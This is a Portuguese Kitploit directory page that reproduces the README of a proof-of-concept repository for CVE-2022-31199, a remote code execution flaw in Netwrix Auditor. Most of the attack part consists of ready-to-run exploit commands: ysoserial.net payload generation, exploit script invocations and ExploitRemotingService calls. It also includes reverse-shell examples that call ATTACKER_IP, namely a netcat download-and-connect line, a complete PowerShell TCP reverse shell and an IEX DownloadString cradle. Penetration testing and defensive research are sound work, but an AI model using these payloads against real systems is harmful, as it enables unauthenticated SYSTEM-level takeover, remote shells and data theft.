Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-31199 — Provas de conceito para CVE-2022-31199, uma vulnerabilidade crítica de desserialização RCE no .NET no Netwrix Auditor. Inclui scripts em Python e PowerShell, geração de payloads com ysoserial.net e assinaturas de detecção para testes de segurança autorizados. | Kitploit
Ferramentas/GitHubGitHub/developerfred/cve-2022-31199
Análise de VulnerabilidadesExploraçãoTestes de PenetraçãoComando e ControleAprendizado e EducaçãoRed TeamingDesenvolvimento de PayloadsLabs e Prática
GitHub
developerfred/cve-2022-31199

CVE-2022-31199

Provas de conceito para CVE-2022-31199, uma vulnerabilidade crítica de desserialização RCE no .NET no Netwrix Auditor. Inclui scripts em Python e PowerShell, geração de payloads com ysoserial.net e assinaturas de detecção para testes de segurança autorizados.

Ver Repositório
14há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-31199 - PoCs de Exploit de RCE do Netwrix Auditor

🔍 Visão Geral da Vulnerabilidade

CVE-2022-31199 é uma vulnerabilidade crítica de desserialização insegura de objetos no Netwrix Auditor em versões anteriores à 10.5. A vulnerabilidade existe em um serviço .NET Remoting não protegido que escuta na porta TCP 9004, permitindo que atacantes remotos não autenticados executem código arbitrário com privilégios de NT AUTHORITY\SYSTEM.

Detalhes da Vulnerabilidade

  • CVE ID: CVE-2022-31199
  • Pontuação CVSS: 9.8 (Crítica)
  • CWE: CWE-502 (Desserialização de Dados Não Confiáveis)
  • Versões Afetadas: Netwrix Auditor < 10.5
  • Vetor de Ataque: Rede (Não Autenticado)
  • Privilégios Necessários: Nenhum
  • Impacto: Comprometimento total do sistema com privilégios de SYSTEM
  • CISA KEV: Listado no Catálogo de Vulnerabilidades Exploradas Conhecidas

Impacto no Mundo Real

Esta vulnerabilidade tem sido ativamente explorada no mundo real por:

  • Campanha do malware Truebot (operadores de ransomware CL0P/TA505 afiliados à Rússia)
  • Grupo cibercriminoso Silence
  • Atores de ameaça FIN11

A exploração bem-sucedida normalmente leva a:

  • Comprometimento total do domínio Active Directory
  • Movimento lateral entre sistemas monitorados
  • Exfiltração de dados
  • Implantação de ransomware

📦 Conteúdo do Repositório

Este repositório contém exploits completos de Prova de Conceito (PoC) para CVE-2022-31199:

Arquivos

  1. exploit.py - Framework de exploração baseado em Python
  2. exploit.ps1 - Script de exploração em PowerShell
  3. README.md - Esta documentação
  4. manual-exploitation.md - Guia passo a passo de exploração manual

🛠️ Requisitos

Ferramentas Necessárias

Exploração Baseada em Windows (Recomendado)

  • ysoserial.net - Gerador de payloads de desserialização .NET

    • Download: https://github.com/pwntester/ysoserial.net
    • Releases: https://github.com/pwntester/ysoserial.net/releases
  • ExploitRemotingService - Ferramenta de exploração .NET Remoting

    • Download: https://github.com/tyranid/ExploitRemotingService
    • Alternativa (aprimorada): https://github.com/codewhitesec/ExploitRemotingService

Requisitos do Script Python

  • Python 3.6 ou superior
  • Apenas biblioteca padrão (sem dependências externas para verificações básicas)
  • Acesso aos executáveis do ysoserial.net e do ExploitRemotingService

Requisitos do Script PowerShell

  • PowerShell 5.1 ou superior
  • Sistema operacional Windows
  • ysoserial.exe e ExploitRemotingService.exe no diretório do script

🚀 Início Rápido

1. Verificar se o Alvo é Vulnerável

Usando Python:

python3 exploit.py --target 192.168.1.100 --check

Usando PowerShell:

.\exploit.ps1 -Target 192.168.1.100 -CheckOnly

2. Gerar Payload

# Using ysoserial.net
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "whoami"

3. Executar o Exploit

Python (com payload pré-gerado):

python3 exploit.py --target 192.168.1.100 --payload [BASE64_PAYLOAD]

PowerShell (automático):

.\exploit.ps1 -Target 192.168.1.100 -Command "whoami"

📖 Uso Detalhado

Exploit em Python (exploit.py)

Verificação Básica de Vulnerabilidade

python3 exploit.py --target 10.10.10.100 --check

Exploração Completa com Payload Personalizado

# Step 1: Generate payload
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "cmd /c whoami > C:\temp\output.txt"

# Step 2: Execute exploit
python3 exploit.py --target 10.10.10.100 --payload AAEAAAD....[base64_payload]

Opções Avançadas

# Custom port
python3 exploit.py --target 10.10.10.100 --port 9004 --check

# Custom endpoint
python3 exploit.py --target 10.10.10.100 --endpoint UAVRServer --check

Argumentos de Linha de Comando

--target    : Target IP address or hostname (required)
--port      : Target port (default: 9004)
--endpoint  : .NET Remoting endpoint name (default: UAVRServer)
--check     : Only check vulnerability, don't exploit
--payload   : Base64 encoded payload from ysoserial.net

Exploit em PowerShell (exploit.ps1)

Apenas Verificação de Vulnerabilidade

.\exploit.ps1 -Target 192.168.1.100 -CheckOnly

Executar Comando

# Simple command execution
.\exploit.ps1 -Target 192.168.1.100 -Command "whoami"

# Write output to file
.\exploit.ps1 -Target 192.168.1.100 -Command "cmd /c whoami > C:\temp\out.txt"

# Custom port
.\exploit.ps1 -Target 192.168.1.100 -Port 9004 -Command "hostname"

Parâmetros

-Target     : Target IP address or hostname (required)
-Port       : Target port (default: 9004)
-Command    : Command to execute on target (default: "whoami")
-CheckOnly  : Only check vulnerability, don't exploit

🎯 Exemplos de Exploração

Exemplo 1: Coleta de Informações

# Check system information
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "cmd /c systeminfo > C:\temp\sysinfo.txt"

Exemplo 2: Shell Reverso

Configurar listener:

nc -lvnp 4444

Gerar payload:

ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell -c curl http://ATTACKER_IP/nc.exe -o C:\temp\nc.exe; C:\temp\nc.exe ATTACKER_IP 4444 -e cmd.exe"

Exemplo 3: Shell Reverso em PowerShell

Criar script de shell reverso (rev.ps1):

$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
};
$client.Close()

Hospedar o script:

python3 -m http.server 8000

Gerar payload:

ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:8000/rev.ps1')"

Exemplo 4: Usando o ExploitRemotingService Diretamente

# Test connectivity
ExploitRemotingService.exe tcp://192.168.1.100:9004/UAVRServer ver

# Execute with lease mode (bypasses some protections)
ExploitRemotingService.exe -uselease tcp://192.168.1.100:9004/UAVRServer ls C:\

# Execute with object reference
ExploitRemotingService.exe -useobjref tcp://192.168.1.100:9004/UAVRServer exec "whoami"

🔬 Detalhes Técnicos

Causa Raiz da Vulnerabilidade

A vulnerabilidade decorre de:

  1. Endpoint .NET Remoting não protegido na porta TCP 9004
  2. Desserialização BinaryFormatter sem filtragem adequada de tipos
  3. Serviço UAVRServer aceitando objetos serializados arbitrários
  4. Serviço executando com privilégios de SYSTEM em implantações típicas

Processo de Exploração

1. Attacker connects to TCP port 9004
2. Identifies .NET Remoting service (UAVRServer endpoint)
3. Generates malicious serialized payload using ysoserial.net
4. Sends payload via .NET Remoting protocol
5. Target deserializes object using BinaryFormatter
6. Gadget chain executes arbitrary code
7. Code runs with NT AUTHORITY\SYSTEM privileges

Gadget Chains Suportadas

As seguintes gadget chains do ysoserial.net funcionam contra esta vulnerabilidade:

  • TypeConfuseDelegate (recomendada)
  • ObjectDataProvider
  • PSObject
  • WindowsIdentity
  • TextFormattingRunProperties

Protocolo de Rede

Baixar ferramenta